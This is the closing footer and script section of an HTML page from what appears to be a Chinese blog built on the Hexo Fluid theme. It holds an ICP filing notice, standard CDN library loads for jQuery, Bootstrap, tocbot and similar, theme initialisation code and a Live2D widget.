    <!-- 备案信息 ICP for China -->
    <div class="beian">
  <span>
    <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
      京ICP证123456号
    </a>
  </span>
  
    
      <span>
        <a
          href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=12345678"
          rel="nofollow noopener"
          class="beian-police"
          target="_blank"
        >
          
            <span style="visibility: hidden; width: 0">|</span>
            <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
          
          <span>京公网安备12345678号</span>
        </a>
      </span>
    
  
</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
